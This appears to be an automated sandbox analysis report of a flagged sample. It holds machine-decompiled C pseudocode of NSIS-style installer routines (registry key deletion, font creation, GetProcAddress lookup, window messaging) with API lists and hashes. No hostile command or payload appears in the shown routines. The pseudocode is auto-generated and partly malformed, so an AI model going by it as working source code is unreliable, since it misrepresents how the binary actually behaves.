                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe02530
                                                                                        0x6fe02535
                                                                                        0x6fe02538
                                                                                        0x6fe02539
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe0256f
                                                                                        0x6fe02575
                                                                                        0x6fe02576
                                                                                        0x6fe02579
                                                                                        0x6fe0257a
                                                                                        0x6fe0257c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe02588
                                                                                        0x6fe0258b
                                                                                        0x6fe02597
                                                                                        0x6fe02599
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe025a5
                                                                                        0x6fe025b1
                                                                                        0x6fe025b4
                                                                                        0x6fe025b6
                                                                                        0x6fe025b9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe02508
                                                                                        0x6fe02502
                                                                                        0x6fe024db
                                                                                        0x6fe024e0
                                                                                        0x00000000
                                                                                        0x6fe024e0

                                                                                        APIs
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE025C2
                                                                                          • Part of subcall function 6FE012CC: lstrcpynW.KERNEL32(00000000,?,6FE0137F,00000019,6FE011CA,-000000A0), ref: 6FE012DC
                                                                                        • GlobalAlloc.KERNEL32(00000040), ref: 6FE02548
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FE02563
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213854083572.000000006FE01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE00000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213854032953.000000006FE00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854145780.000000006FE04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854195381.000000006FE06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_6fe00000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                        • String ID:
                                                                                        • API String ID: 4216380887-0
                                                                                        • Opcode ID: 563bff7a38de07f66f3d38df0bed1e34f12b20fb3fb4594d2eac62c3a134a2ea
                                                                                        • Instruction ID: 039848566ff7be2c70268ddfab3d77869ebab4953e03b6e8e6995e391f1c38e6
                                                                                        • Opcode Fuzzy Hash: 563bff7a38de07f66f3d38df0bed1e34f12b20fb3fb4594d2eac62c3a134a2ea
                                                                                        • Instruction Fuzzy Hash: 7141E2B0008705DFDB14FF68D940A2A7FF8FB66318F30461EE5498A281E735A471CB66
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 48%
                                                                                        			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                        				void* _v8;
                                                                                        				int _v12;
                                                                                        				short _v536;
                                                                                        				void* _t27;
                                                                                        				signed int _t33;
                                                                                        				intOrPtr* _t35;
                                                                                        				signed int _t45;
                                                                                        				signed int _t46;
                                                                                        				signed int _t47;
                                                                                        
                                                                                        				_t46 = _a12;
                                                                                        				_t47 = _t46 & 0x00000300;
                                                                                        				_t45 = _t46 & 0x00000001;
                                                                                        				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                                        				if(_t27 == 0) {
                                                                                        					if((_a12 & 0x00000002) == 0) {
                                                                                        						L3:
                                                                                        						_push(0x105);
                                                                                        						_push( &_v536);
                                                                                        						_push(0);
                                                                                        						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                                        							__eflags = _t45;
                                                                                        							if(__eflags != 0) {
                                                                                        								L10:
                                                                                        								RegCloseKey(_v8);
                                                                                        								return 0x3eb;
                                                                                        							}
                                                                                        							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                                                        							__eflags = _t33;
                                                                                        							if(_t33 != 0) {
                                                                                        								break;
                                                                                        							}
                                                                                        							_push(0x105);
                                                                                        							_push( &_v536);
                                                                                        							_push(_t45);
                                                                                        						}
                                                                                        						RegCloseKey(_v8);
                                                                                        						_t35 = E0040690A(3);
                                                                                        						if(_t35 != 0) {
                                                                                        							return  *_t35(_a4, _a8, _t47, 0);
                                                                                        						}
                                                                                        						return RegDeleteKeyW(_a4, _a8);
                                                                                        					}
                                                                                        					_v12 = 0;
                                                                                        					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                        						goto L10;
                                                                                        					}
                                                                                        					goto L3;
                                                                                        				}
                                                                                        				return _t27;
                                                                                        			}












                                                                                        0x00402eb4
                                                                                        0x00402ebd
                                                                                        0x00402ec6
                                                                                        0x00402ed2
                                                                                        0x00402edb
                                                                                        0x00402ee5
                                                                                        0x00402f0a
                                                                                        0x00402f10
                                                                                        0x00402f15
                                                                                        0x00402f16
                                                                                        0x00402f46
                                                                                        0x00402f1f
                                                                                        0x00402f21
                                                                                        0x00402f71
                                                                                        0x00402f74
                                                                                        0x00000000
                                                                                        0x00402f7a
                                                                                        0x00402f30
                                                                                        0x00402f35
                                                                                        0x00402f37
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402f3f
                                                                                        0x00402f44
                                                                                        0x00402f45
                                                                                        0x00402f45
                                                                                        0x00402f52
                                                                                        0x00402f5a
                                                                                        0x00402f61
                                                                                        0x00000000
                                                                                        0x00402f8a
                                                                                        0x00000000
                                                                                        0x00402f69
                                                                                        0x00402ef5
                                                                                        0x00402f08
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402f08
                                                                                        0x00402f90

                                                                                        APIs
                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseEnum$DeleteValue
                                                                                        • String ID:
                                                                                        • API String ID: 1354259210-0
                                                                                        • Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                        • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                        • Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                        • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 77%
                                                                                        			E00401D81(void* __ebx, void* __edx) {
                                                                                        				struct HWND__* _t30;
                                                                                        				WCHAR* _t38;
                                                                                        				void* _t48;
                                                                                        				void* _t53;
                                                                                        				signed int _t55;
                                                                                        				signed int _t60;
                                                                                        				long _t63;
                                                                                        				void* _t65;
                                                                                        
                                                                                        				_t53 = __ebx;
                                                                                        				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                                        					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                                        				} else {
                                                                                        					E00402D84(2);
                                                                                        					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                                        				}
                                                                                        				_t55 =  *(_t65 - 0x24);
                                                                                        				 *(_t65 + 8) = _t30;
                                                                                        				_t60 = _t55 & 0x00000004;
                                                                                        				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                                        				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                                        				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                                        				if((_t55 & 0x00010000) == 0) {
                                                                                        					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                                        				} else {
                                                                                        					_t38 = E00402DA6(0x11);
                                                                                        				}
                                                                                        				 *(_t65 - 0x44) = _t38;
                                                                                        				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                                        				asm("sbb esi, esi");
                                                                                        				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                                        				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                                        				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                                        					DeleteObject(_t48);
                                                                                        				}
                                                                                        				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                                        					_push(_t63);
                                                                                        					E00406484();
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                                                                                        				return 0;
                                                                                        			}











                                                                                        0x00401d81
                                                                                        0x00401d85
                                                                                        0x00401d9a
                                                                                        0x00401d87
                                                                                        0x00401d89
                                                                                        0x00401d8f
                                                                                        0x00401d8f
                                                                                        0x00401da0
                                                                                        0x00401da3
                                                                                        0x00401dad
                                                                                        0x00401db0
                                                                                        0x00401db8
                                                                                        0x00401dc9
                                                                                        0x00401dcc
                                                                                        0x00401dd7
                                                                                        0x00401dce
                                                                                        0x00401dd0
                                                                                        0x00401dd0
                                                                                        0x00401ddb
                                                                                        0x00401de5
                                                                                        0x00401e0c
                                                                                        0x00401e1b
                                                                                        0x00401e29
                                                                                        0x00401e31
                                                                                        0x00401e39
                                                                                        0x00401e39
                                                                                        0x00401e42
                                                                                        0x00401e48
                                                                                        0x00402ba4
                                                                                        0x00402ba4
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                        • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                        • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                        • String ID:
                                                                                        • API String ID: 1849352358-0
                                                                                        • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                        • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                                        • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                        • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 73%
                                                                                        			E00401E4E(intOrPtr __edx) {
                                                                                        				void* __edi;
                                                                                        				int _t9;
                                                                                        				signed char _t15;
                                                                                        				struct HFONT__* _t18;
                                                                                        				intOrPtr _t30;
                                                                                        				void* _t31;
                                                                                        				struct HDC__* _t33;
                                                                                        				void* _t35;
                                                                                        
                                                                                        				_t30 = __edx;
                                                                                        				_t33 = GetDC( *(_t35 - 8));
                                                                                        				_t9 = E00402D84(2);
                                                                                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                        				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                                        				ReleaseDC( *(_t35 - 8), _t33);
                                                                                        				 *0x40ce00 = E00402D84(3);
                                                                                        				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                        				 *0x40ce07 = 1;
                                                                                        				 *0x40ce04 = _t15 & 0x00000001;
                                                                                        				 *0x40ce05 = _t15 & 0x00000002;
                                                                                        				 *0x40ce06 = _t15 & 0x00000004;
                                                                                        				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                                                                                        				_t18 = CreateFontIndirectW(0x40cdf0);
                                                                                        				_push(_t18);
                                                                                        				_push(_t31);
                                                                                        				E00406484();
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                                        				return 0;
                                                                                        			}











                                                                                        0x00401e4e
                                                                                        0x00401e59
                                                                                        0x00401e5b
                                                                                        0x00401e68
                                                                                        0x00401e7f
                                                                                        0x00401e84
                                                                                        0x00401e91
                                                                                        0x00401e96
                                                                                        0x00401e9a
                                                                                        0x00401ea5
                                                                                        0x00401eac
                                                                                        0x00401ebe
                                                                                        0x00401ec4
                                                                                        0x00401ec9
                                                                                        0x00401ed3
                                                                                        0x00402638
                                                                                        0x0040156d
                                                                                        0x00402ba4
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • GetDC.USER32(?), ref: 00401E51
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                          • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                          • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,00000000), ref: 00406779
                                                                                        • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 2584051700-0
                                                                                        • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                        • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                                        • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                        • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E6FE016BD(struct HINSTANCE__* _a4, short* _a8) {
                                                                                        				_Unknown_base(*)()* _t7;
                                                                                        				void* _t10;
                                                                                        				int _t14;
                                                                                        
                                                                                        				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                                        				_t10 = GlobalAlloc(0x40, _t14);
                                                                                        				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                                        				_t7 = GetProcAddress(_a4, _t10);
                                                                                        				GlobalFree(_t10);
                                                                                        				return _t7;
                                                                                        			}






                                                                                        0x6fe016d7
                                                                                        0x6fe016e3
                                                                                        0x6fe016f0
                                                                                        0x6fe016f7
                                                                                        0x6fe01700
                                                                                        0x6fe0170c

                                                                                        APIs
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FE022D8,?,00000808), ref: 6FE016D5
                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FE022D8,?,00000808), ref: 6FE016DC
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FE022D8,?,00000808), ref: 6FE016F0
                                                                                        • GetProcAddress.KERNEL32(6FE022D8,00000000), ref: 6FE016F7
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE01700
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213854083572.000000006FE01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE00000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213854032953.000000006FE00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854145780.000000006FE04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854195381.000000006FE06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_6fe00000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                        • String ID:
                                                                                        • API String ID: 1148316912-0
                                                                                        • Opcode ID: 8625f023e4343216c7bca8f677ab3dfbb5d827402a862069ea1a2e0507f95c92
                                                                                        • Instruction ID: 864639bd4634cb773359e9316ed161b790622f3d7b1e0c3afc13d7baf8afd804
                                                                                        • Opcode Fuzzy Hash: 8625f023e4343216c7bca8f677ab3dfbb5d827402a862069ea1a2e0507f95c92
                                                                                        • Instruction Fuzzy Hash: E5F012721065387BDA2116A68D4CC9B7E9DEF9B3F5B110216F718A11A085624C21D7F6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 59%
                                                                                        			E00401C43(intOrPtr __edx) {
                                                                                        				int _t29;
                                                                                        				long _t30;
                                                                                        				signed int _t32;
                                                                                        				WCHAR* _t35;
                                                                                        				long _t36;
                                                                                        				int _t41;
                                                                                        				signed int _t42;
                                                                                        				int _t46;
                                                                                        				int _t56;
                                                                                        				intOrPtr _t57;
                                                                                        				struct HWND__* _t63;
                                                                                        				void* _t64;
                                                                                        
                                                                                        				_t57 = __edx;
                                                                                        				_t29 = E00402D84(3);
                                                                                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                        				 *(_t64 - 0x18) = _t29;
                                                                                        				_t30 = E00402D84(4);
                                                                                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                        				 *(_t64 + 8) = _t30;
                                                                                        				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                                        					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                                                        				}
                                                                                        				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                                        				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                                        					 *(_t64 + 8) = E00402DA6(0x44);
                                                                                        				}
                                                                                        				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                                        				_push(1);
                                                                                        				if(__eflags != 0) {
                                                                                        					_t61 = E00402DA6();
                                                                                        					_t32 = E00402DA6();
                                                                                        					asm("sbb ecx, ecx");
                                                                                        					asm("sbb eax, eax");
                                                                                        					_t35 =  ~( *_t31) & _t61;
                                                                                        					__eflags = _t35;
                                                                                        					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                        					goto L10;
                                                                                        				} else {
                                                                                        					_t63 = E00402D84();
                                                                                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                        					_t41 = E00402D84(2);
                                                                                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                        					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                                        					if(__eflags == 0) {
                                                                                        						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                                        						L10:
                                                                                        						 *(_t64 - 0x38) = _t36;
                                                                                        					} else {
                                                                                        						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                                        						asm("sbb eax, eax");
                                                                                        						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                        					}
                                                                                        				}
                                                                                        				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                                        				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                                        					_push( *(_t64 - 0x38));
                                                                                        					E00406484();
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                                                        				return 0;
                                                                                        			}















                                                                                        0x00401c43
                                                                                        0x00401c45
                                                                                        0x00401c4c
                                                                                        0x00401c4f
                                                                                        0x00401c52
                                                                                        0x00401c5c
                                                                                        0x00401c60
                                                                                        0x00401c63
                                                                                        0x00401c6c
                                                                                        0x00401c6c
                                                                                        0x00401c6f
                                                                                        0x00401c73
                                                                                        0x00401c7c
                                                                                        0x00401c7c
                                                                                        0x00401c7f
                                                                                        0x00401c83
                                                                                        0x00401c85
                                                                                        0x00401cda
                                                                                        0x00401cdc
                                                                                        0x00401ce7
                                                                                        0x00401cf1
                                                                                        0x00401cf4
                                                                                        0x00401cf4
                                                                                        0x00401cfd
                                                                                        0x00000000
                                                                                        0x00401c87
                                                                                        0x00401c8e
                                                                                        0x00401c90
                                                                                        0x00401c93
                                                                                        0x00401c99
                                                                                        0x00401ca0
                                                                                        0x00401ca3
                                                                                        0x00401ccb
                                                                                        0x00401d03
                                                                                        0x00401d03
                                                                                        0x00401ca5
                                                                                        0x00401cb3
                                                                                        0x00401cbb
                                                                                        0x00401cbe
                                                                                        0x00401cbe
                                                                                        0x00401ca3
                                                                                        0x00401d06
                                                                                        0x00401d09
                                                                                        0x00401d0f
                                                                                        0x00402ba4
                                                                                        0x00402ba4
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Timeout
                                                                                        • String ID: !
                                                                                        • API String ID: 1777923405-2657877971
                                                                                        • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                        • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                        • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                        • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 77%
                                                                                        			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                        				char _v68;
                                                                                        				char _v132;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				signed int _t23;
                                                                                        				signed int _t24;
                                                                                        				void* _t31;
                                                                                        				void* _t33;
                                                                                        				void* _t34;
                                                                                        				void* _t44;
                                                                                        				signed int _t46;
                                                                                        				signed int _t50;
                                                                                        				signed int _t52;
                                                                                        				signed int _t53;
                                                                                        				signed int _t55;
                                                                                        
                                                                                        				_t23 = _a16;
                                                                                        				_t53 = _a12;
                                                                                        				_t44 = 0xffffffdc;
                                                                                        				if(_t23 == 0) {
                                                                                        					_push(0x14);
                                                                                        					_pop(0);
                                                                                        					_t24 = _t53;
                                                                                        					if(_t53 < 0x100000) {
                                                                                        						_push(0xa);
                                                                                        						_pop(0);
                                                                                        						_t44 = 0xffffffdd;
                                                                                        					}
                                                                                        					if(_t53 < 0x400) {
                                                                                        						_t44 = 0xffffffde;
                                                                                        					}
                                                                                        					if(_t53 < 0xffff3333) {
                                                                                        						_t52 = 0x14;
                                                                                        						asm("cdq");
                                                                                        						_t24 = 1 / _t52 + _t53;
                                                                                        					}
                                                                                        					_t25 = _t24 & 0x00ffffff;
                                                                                        					_t55 = _t24 >> 0;
                                                                                        					_t46 = 0xa;
                                                                                        					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                        				} else {
                                                                                        					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                        					_t50 = 0;
                                                                                        				}
                                                                                        				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                        				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                                                                                        				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                                                                        				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                        				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                                                                        			}



















